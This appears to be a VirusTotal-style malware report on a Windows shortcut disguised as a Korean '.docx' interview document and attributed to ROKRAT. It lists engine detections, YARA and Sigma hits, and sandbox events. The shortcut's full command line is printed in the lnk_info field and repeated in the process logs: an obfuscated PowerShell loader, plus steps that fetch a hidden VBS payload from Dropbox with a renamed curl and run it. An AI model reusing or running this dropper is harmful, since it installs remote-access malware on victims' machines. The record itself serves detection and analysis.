ba8e682a72c6a3e634c070f0fb057bf5
Hash
- MD5: ba8e682a72c6a3e634c070f0fb057bf5
- SHA1: bd422dc1a133c3ac27fb4bfccb098eec3cf9f322
- SHA256: e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73
- First Seen: 2026-05-13
- Last Seen: 2026-05-13
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73"
},
"attributes": {
"tlsh": "T179E39EA132F51457E9B1AEF4AEBCA3016CBB7122A130C54F0CCD5B0D9763A85C562F1E",
"last_submission_date": 1773806006,
"first_submission_date": 1773806006,
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"TROJAN",
"EVADER"
],
"sandbox_name": "Zenbox",
"malware_names": [
"ROKRAT"
],
"confidence": 100
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
},
"C2AE": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "C2AE",
"malware_names": [
"LnkMalicious"
],
"confidence": 80
}
},
"last_analysis_results": {
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260605",
"category": "malicious",
"result": "lnk.trojan.pantera"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260604",
"category": "malicious",
"result": "Script.Trojan.50708.GC"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260604",
"category": "malicious",
"result": "BehavesLike.Trojan.cx"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.238",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260601",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.55.59724",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.55.59722",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1221",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan Horse"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/Agent.AMP trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260605",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR:Trojan.Multi.Powecod.a"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260604",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan.TR/LNK.Agent.EW"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260604",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260605",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5 (B)"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44797AVA:64.31365",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1780642860",
"engine_update": "20260605",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260605",
"category": "malicious",
"result": "TR/LNK.Agent.EW"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38704",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260605",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.443C4AF5 [many]"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107315",
"engine_update": "20260604",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/ABlTrojan.XFWZ"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260605",
"category": "malicious",
"result": "Trojan/LNK.Agent.SC310378"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-05.02",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "malicious",
"result": "Win32.Trojan.Powecod.Qsmw"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260604",
"category": "malicious",
"result": "Trojan-JACI!BA8E682A72C6"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "2751a2f:2751a2f:52f3dc9:52f3dc9",
"engine_update": "20260604",
"category": "malicious",
"result": "TrojanDownloader/LNK.Starter.a"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260605",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260605",
"category": "malicious",
"result": "LNK/Agent.CVT!tr"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260604",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Multi/Powecod.a"
},
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": null,
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5615",
"engine_update": "20260604",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260604",
"category": "timeout",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260605",
"category": "timeout",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260605",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260604-02",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260603",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.785",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260605",
"category": "type-unsupported",
"result": null
}
},
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1780648504,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Execution_in_LNK",
"match_date": 1780648504,
"description": "Identifies execution artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1780648504,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1780648504,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "01aaae7eed",
"ruleset_version": "01aaae7eed|834366aa118f4e231f6f835e1dd479dab29dc599",
"ruleset_name": "apt_reaper_malicious_lnk",
"rule_name": "apt_reaper_malicious_lnk",
"match_date": 1780648504,
"author": "Sekoia.io",
"source": "https://github.com/SEKOIA-IO/Community"
}
],
"unique_sources": 1,
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"sha1": "bd422dc1a133c3ac27fb4bfccb098eec3cf9f322",
"meaningful_name": "\uc911\uad6d CMG \uc778\ud130\ubdf0.docx.lnk",
"sha256": "e49399502d455dbd38f1140bffa761701608526aefb7174646c2f8ffe881ae73",
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX:SFQMWnoXVVP.MKQ4epUkhW3nf6Yx]JI8N|gf\\[Ez]JI3\\Y{ve5QkeI{3]Z4zM}v;L38og|EWgKov]VP.MJ8ygJophW4K][TwT5kseJUMgJYwLF4T\\[UrLFU}gZ8n\\[njOYMo\\6Y|f5XjOX]seKUoflDtOp{xd6{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK4;Up<|UZImdF4S\\pso\\6U:MI;xUqYveH8keZY<iIQoeJYmgF4S\\pso\\6TjOX]sfqQ3LGH:SFQMWnoXVVP.MJ4yepwohW3nep<3dZ]8iWv;L3QSWXvmSlUydZz<MJ8ygJophV8}gZM}gKMsepfrPFznep<3dZ]8Op{oepg3dF33NWvng5o|]W4eX6o}gJYwOnoSOnMsepI|hYMo\\ZUofo39Rp8og|keX6o}gJYwOnoSOn]seJYgRmsyfJYxNFUxe6Us]qnvZ4Q8f6UoeV8MW|8JdZ{oWZ<n]Y39Rn<z]Z7vZ4Q8f6UoeV8MW|8JdZ{oTZQm][Q}[Wr9XpYk]F{eX6o}gJYwOnoSOn]seJYWdJI|]Y39RoMo\\ZTsNWv;L3oRVYUML}83fqo:MKgsfpXxTpI}]YQ3fpYkeV8W]ZYuNGE7PGDzPGIFQWjvZ4Q8f6UoeV8MW|8W]ZYuW6Ms]5ox[Wr9TpYqdZ7sR|U}ep<6SVU6d[MoOoMo\\ZUFh[Uof|jzhGD5RWf|NWw<]pox\\Z{vh[vng5o|]V8GeJ<}]VjsiWv;L3QSWXvmSlUleJImd}3zR|UmdJIsfm3zR|Ule5U8SVU}ep<6OpQygZ83R6grdZ{oLFjn\\p{k\\5vjOZ{3LFUle5U8N[vn\\5ksfKEofm3zhGL5R|Un\\[UoSVjn\\5ksfKEoflvn\\p{k\\5voPlnoPKj{PGD:MKQxe6geMJMv\\ZQu[W3nf58yg4vn\\p{k\\5wgLF4lhJ<|LFUn\\[UoR|UleJImd|vuiWv;L3QSWXvmSowWh[Q3]Z3xVX;xUpov]Y39Rog|d[UoTZ{vTqo3][PrMJ<seFznf58yg|n:SFQMWnoXVVP.dZ\\rMJQye[DjOZY{LGHsh|Ule5<uSVUydZ{<]Z{}][vn\\p<yd}3qOozqN|UydZ{<R|\\jMJMye5v:fpYwe6]oOZo3]Z3jO[EkgJjjMJ4yepwohVDw]p<|\\5X:SFQMWnoXVVP.';$key=3;for($i=0;$i -le $se.Length;$i++){$v+=[System.Text.Encoding]::ASCII.GetString($se[$i]-3)};$b = [System.Convert]::FromBase64String($v);$c = [System.Text.Encoding]::UTF8.GetString($b);$c;$sb = [scriptblock]::Create($c); & $sb;\"&cd /d \"%appdata%\\Microsoft\\MMC\" & copy c:\\windows\\system32\\curl.exe TMP0392.exe & TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7e&st=ip1rnvm2&dl=0\" &attrib +h taskschd.vbs &taskschd.vbs&exit\u001f\u0000",
"icon_location": ".DOCX",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"size": 155896,
"ssdeep": "768:OqC8AsQQYVgLG+Ypyvcg9c4xcRyeDj88u1XmYk:tzQQggLGPpyvcYKye388mmYk",
"type_tags": [
"windows",
"lnk"
],
"reputation": -1,
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "8d980d509aaf7ca8f2c6cd9dd23e8ea6eb18328ca64711cb6e059ecec024fe0a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Outbound Network Connection Initiated By Script Interpreter",
"rule_description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.110.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"SourcePort": "58971",
"Image": "C:\\Windows\\System32\\wscript.exe",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"DestinationIp": "104.18.20.213",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\System32\\wscript.exe",
"SourcePort": "58973",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.110.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "59003",
"Initiated": "true"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e6fdb32f143bba16a3ea06247ced55b7b90f8b5b5c6c26ddb95cdcf23908af8a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Command Line Obfuscation",
"rule_description": "Detects the PowerShell command lines with special characters",
"rule_author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
"match_context": [
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
